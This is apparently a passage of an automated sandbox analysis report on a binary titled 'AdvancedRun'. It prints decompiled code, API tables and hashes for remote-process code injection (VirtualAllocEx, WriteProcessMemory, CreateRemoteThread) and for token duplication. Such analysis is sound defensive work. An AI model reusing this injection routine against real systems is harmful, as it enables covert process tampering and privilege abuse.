					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                      0x00408e38
                                                                                      0x00408e44
                                                                                      0x00408e56
                                                                                      0x00408e68
                                                                                      0x00408e7a
                                                                                      0x00408e8c
                                                                                      0x00408e9e
                                                                                      0x00408eb0
                                                                                      0x00408ec2
                                                                                      0x00408ed4
                                                                                      0x00408ee6
                                                                                      0x00408ef8
                                                                                      0x00408f0a
                                                                                      0x00408f1c
                                                                                      0x00408f21
                                                                                      0x00408f23
                                                                                      0x00000000
                                                                                      0x00408f28
                                                                                      0x00408f29

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                      • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                      • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                      • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                      • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                      • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                      • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                      • API String ID: 667068680-4280973841
                                                                                      • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                      • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                      • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                      • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 70%
                                                                                      			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                      0x0040a474
                                                                                      0x0040a47b
                                                                                      0x0040a48a
                                                                                      0x0040a48d
                                                                                      0x0040a48f
                                                                                      0x0040a497
                                                                                      0x0040a49a
                                                                                      0x0040a6f7
                                                                                      0x0040a6f9
                                                                                      0x0040a700
                                                                                      0x0040a700
                                                                                      0x0040a4ad
                                                                                      0x0040a4b3
                                                                                      0x0040a4b8
                                                                                      0x0040a4c6
                                                                                      0x0040a4cc
                                                                                      0x0040a4cf
                                                                                      0x0040a4dd
                                                                                      0x0040a4e2
                                                                                      0x0040a4e3
                                                                                      0x0040a4ea
                                                                                      0x0040a4e5
                                                                                      0x0040a4e5
                                                                                      0x0040a4e5
                                                                                      0x0040a4ec
                                                                                      0x0040a4f6
                                                                                      0x0040a4fe
                                                                                      0x0040a503
                                                                                      0x0040a504
                                                                                      0x0040a50b
                                                                                      0x0040a506
                                                                                      0x0040a506
                                                                                      0x0040a506
                                                                                      0x0040a50d
                                                                                      0x0040a512
                                                                                      0x0040a518
                                                                                      0x0040a51c
                                                                                      0x0040a523
                                                                                      0x0040a523
                                                                                      0x0040a523
                                                                                      0x0040a528
                                                                                      0x0040a537
                                                                                      0x0040a54c
                                                                                      0x0040a539
                                                                                      0x0040a544
                                                                                      0x0040a549
                                                                                      0x0040a558
                                                                                      0x0040a56d
                                                                                      0x0040a55a
                                                                                      0x0040a565
                                                                                      0x0040a56a
                                                                                      0x0040a579
                                                                                      0x0040a591
                                                                                      0x0040a57b
                                                                                      0x0040a589
                                                                                      0x0040a58e
                                                                                      0x0040a5b4
                                                                                      0x0040a5b7
                                                                                      0x0040a5cc
                                                                                      0x0040a5cf
                                                                                      0x0040a5d4
                                                                                      0x0040a5d7
                                                                                      0x0040a6ed
                                                                                      0x0040a5e5
                                                                                      0x0040a5fa
                                                                                      0x0040a60b
                                                                                      0x0040a61a
                                                                                      0x0040a620
                                                                                      0x0040a623
                                                                                      0x0040a62b
                                                                                      0x0040a62f
                                                                                      0x0040a632
                                                                                      0x0040a659
                                                                                      0x0040a634
                                                                                      0x0040a635
                                                                                      0x0040a641
                                                                                      0x0040a648
                                                                                      0x0040a648
                                                                                      0x0040a668
                                                                                      0x0040a66e
                                                                                      0x0040a685
                                                                                      0x0040a69e
                                                                                      0x0040a6a8
                                                                                      0x0040a6ad
                                                                                      0x0040a6bd
                                                                                      0x0040a6c5
                                                                                      0x0040a6c8
                                                                                      0x0040a6d0
                                                                                      0x0040a6d1
                                                                                      0x0040a6d2
                                                                                      0x0040a6d3
                                                                                      0x0040a6d3
                                                                                      0x0040a6c8
                                                                                      0x0040a6d7
                                                                                      0x0040a6dc
                                                                                      0x0040a6dc
                                                                                      0x0040a6d7
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                      • memset.MSVCRT ref: 0040A4B3
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                        • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                        • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                        • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                        • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                        • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                        • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                      • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                      • memset.MSVCRT ref: 0040A66E
                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                      • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                      • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                      • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                      • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                      • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                      • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                      • API String ID: 1572607441-20550370
                                                                                      • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                      • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                      • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                      • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                      0x004028a3
                                                                                      0x004028ab
                                                                                      0x004028bd
                                                                                      0x004028ca
                                                                                      0x004028d7
                                                                                      0x004028e3
                                                                                      0x004028e6
                                                                                      0x004028e8
                                                                                      0x00000000
                                                                                      0x004028eb
                                                                                      0x004028ec

                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                      • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                      • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                      • API String ID: 2238633743-1970996977
                                                                                      • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                      • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                      • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                      • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 64%
                                                                                      			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                      0x0040a27d
                                                                                      0x0040a286
                                                                                      0x0040a290
                                                                                      0x0040a29d
                                                                                      0x00000000
                                                                                      0x0040a32f
                                                                                      0x0040a29f
                                                                                      0x0040a2a4
                                                                                      0x0040a2ad
                                                                                      0x0040a2b6
                                                                                      0x0040a2bc
                                                                                      0x0040a2be
                                                                                      0x0040a2c4
                                                                                      0x0040a2c8
                                                                                      0x0040a2ce
                                                                                      0x0040a2e3
                                                                                      0x0040a2ed
                                                                                      0x0040a2fb
                                                                                      0x0040a2fe
                                                                                      0x0040a305
                                                                                      0x0040a30c
                                                                                      0x0040a30f
                                                                                      0x0040a313
                                                                                      0x00000000
                                                                                      0x0040a31a
                                                                                      0x0040a338

                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?,74B068A0,00000000), ref: 0040A290
                                                                                      • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                        • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                        • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                      • String ID: $
                                                                                      • API String ID: 283512611-3993045852
                                                                                      • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                      • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                      • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                      • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 85%
                                                                                      			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                      0x00401093
                                                                                      0x00401096
                                                                                      0x00401097
                                                                                      0x0040109b
                                                                                      0x004010a3
                                                                                      0x004010a5
                                                                                      0x00401270
                                                                                      0x00401278
                                                                                      0x004012b3
                                                                                      0x0040127a
                                                                                      0x00401293
                                                                                      0x004012a2
                                                                                      0x004012a2
                                                                                      0x004012c1
                                                                                      0x004012d9
                                                                                      0x004012ea
                                                                                      0x004012ec
                                                                                      0x004012f6
                                                                                      0x00000000
                                                                                      0x004010ab
                                                                                      0x004010ab
                                                                                      0x004010ac
                                                                                      0x00401231
                                                                                      0x00401236
                                                                                      0x00401239
                                                                                      0x0040123d
                                                                                      0x00401249
                                                                                      0x00401249
                                                                                      0x0040124c
                                                                                      0x00000000
                                                                                      0x00401252
                                                                                      0x00401259
                                                                                      0x00401265
                                                                                      0x00000000
                                                                                      0x00401265
                                                                                      0x0040123f
                                                                                      0x0040123f
                                                                                      0x00401243
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00401243
                                                                                      0x004010b2
                                                                                      0x004010b2
                                                                                      0x004010b5
                                                                                      0x004011e1
                                                                                      0x004011e3
                                                                                      0x004011e6
                                                                                      0x0040120e
                                                                                      0x00401216
                                                                                      0x00000000
                                                                                      0x0040121c
                                                                                      0x00401224
                                                                                      0x00401226
                                                                                      0x00401229
                                                                                      0x00000000
                                                                                      0x0040122f
                                                                                      0x00000000
                                                                                      0x0040122f
                                                                                      0x00401229
                                                                                      0x004011e8
                                                                                      0x004011e8
                                                                                      0x004011ed
                                                                                      0x004011fb
                                                                                      0x00401203
                                                                                      0x00401203
                                                                                      0x004010bb
                                                                                      0x004010bb
                                                                                      0x004010c0
                                                                                      0x00401151
                                                                                      0x0040115a
                                                                                      0x00401168
                                                                                      0x0040116b
                                                                                      0x0040116e
                                                                                      0x00401170
                                                                                      0x00401173
                                                                                      0x00401180
                                                                                      0x00401182
                                                                                      0x00401185
                                                                                      0x004011a4
                                                                                      0x004011ac
                                                                                      0x00000000
                                                                                      0x004011b2
                                                                                      0x004011ba
                                                                                      0x004011bc
                                                                                      0x004011c7
                                                                                      0x004011c9
                                                                                      0x004011cb
                                                                                      0x00000000
                                                                                      0x004011d1
                                                                                      0x00000000
                                                                                      0x004011d1
                                                                                      0x004011cb
                                                                                      0x00401187
                                                                                      0x00401187
                                                                                      0x00401199
                                                                                      0x00000000
                                                                                      0x00401199
                                                                                      0x004010c6
                                                                                      0x004010c8
                                                                                      0x004012fd
                                                                                      0x004012fd
                                                                                      0x004012fd
                                                                                      0x004010ce
                                                                                      0x004010ce
                                                                                      0x004010d7
                                                                                      0x004010e5
                                                                                      0x004010e8
                                                                                      0x004010eb
                                                                                      0x004010ed
                                                                                      0x004010f0
                                                                                      0x00401102
                                                                                      0x0040111d
                                                                                      0x00401125
                                                                                      0x00000000
                                                                                      0x0040112b
                                                                                      0x00401133
                                                                                      0x00401135
                                                                                      0x00401140
                                                                                      0x00401142
                                                                                      0x00401144
                                                                                      0x00000000
                                                                                      0x0040114a
                                                                                      0x0040114a
                                                                                      0x00000000
                                                                                      0x0040114a
                                                                                      0x00401144
                                                                                      0x00401104
                                                                                      0x0040110a
                                                                                      0x0040110b
                                                                                      0x0040110b
                                                                                      0x0040110e
                                                                                      0x00401115
                                                                                      0x00401117
                                                                                      0x00401117
                                                                                      0x00401102
                                                                                      0x004010c8
                                                                                      0x004010c0
                                                                                      0x004010b5
                                                                                      0x004010ac
                                                                                      0x00401303

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                      • String ID: AdvancedRun
                                                                                      • API String ID: 829165378-481304740
                                                                                      • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                      • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
